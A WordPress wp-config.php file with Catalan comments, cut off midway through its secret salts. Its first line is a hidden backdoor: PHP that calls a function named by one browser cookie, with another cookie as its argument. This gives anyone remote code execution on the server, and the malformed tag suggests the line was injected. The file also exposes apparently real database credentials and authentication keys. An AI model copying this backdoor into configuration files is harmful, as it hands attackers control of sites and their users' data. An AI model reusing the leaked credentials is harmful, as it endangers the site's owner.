<%>PHP if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); <%> /** * Les configuracions bàsiques del WordPress. * * Aquest fitxer té les següents configuracions: configuració de MySQL, prefix de taules, * claus secretes, idioma del WordPress i ABSPATH. Trobaràs més informació * al Còdex (en anglès): {@link http://codex.wordpress.org/Editing_wp-config.php Editant * el wp-config.php}. Les dades per a configurar MySQL les pots obtenir del * teu proveïdor d'hostatjament de web. * * Aquest fitxer és usat per l'script de creació de wp-config.php durant la * instal·lació. No cal que usis el web, pots simplement copiar aquest fitxer * sota el nom "wp-config.php" i omplir-lo amb els teus valors. * * @package WordPress */ /* FINISMEDIA */ /* define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST']); define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST']); */ define( 'WP_MEMORY_LIMIT', '256M' ); define( 'WP_AUTO_UPDATE_CORE', false ); // ** Configuració de MySQL - Pots obtenir aquestes informacions del teu proveïdor de web ** // /** El nom de la base de dades per al WordPress */ define('DB_NAME', 'wpfapigarrotxa'); /** El teu nom d'usuari a MySQL */ define('DB_USER', 'fapiga7619'); /** La teva contrasenya a MySQL */ define('DB_PASSWORD', 'J9WZHNdw'); /** Nom del host de MySQL */ define('DB_HOST', 'localhost'); /** Joc de caràcters usat en crear taules a la base de dades. */ define('DB_CHARSET', 'utf8'); /** Tipus d'ordenació en la base de dades. No ho canvïis si tens cap dubte. */ define('DB_COLLATE', ''); /**#@+ * Claus úniques d'autentificació. * * Canvia-les per frases úniques diferents! * Les pots generar usant el {@link http://api.wordpress.org/secret-key/1.1/ servei de claus secretes de WordPress.org} * * @since 2.6.0 */ define('AUTH_KEY', 'Z;IvridPJo/lIti@x`]!ddke+6YT0VH0N{qggE-lG!C_u ?+(p0C8`1VK~0(+y;K=i'); define('AUTH_SALT', '!oD}o!_T:u[HE=nU-V|Zm;>N18[;B)X-wGD|P^.N=M<{'); define('SECURE_AUTH_SALT', '%|?O2={r7{e-M>p4_[WuB[[px;,t0-*&bK$62oV3|8Y8u27)on^spE}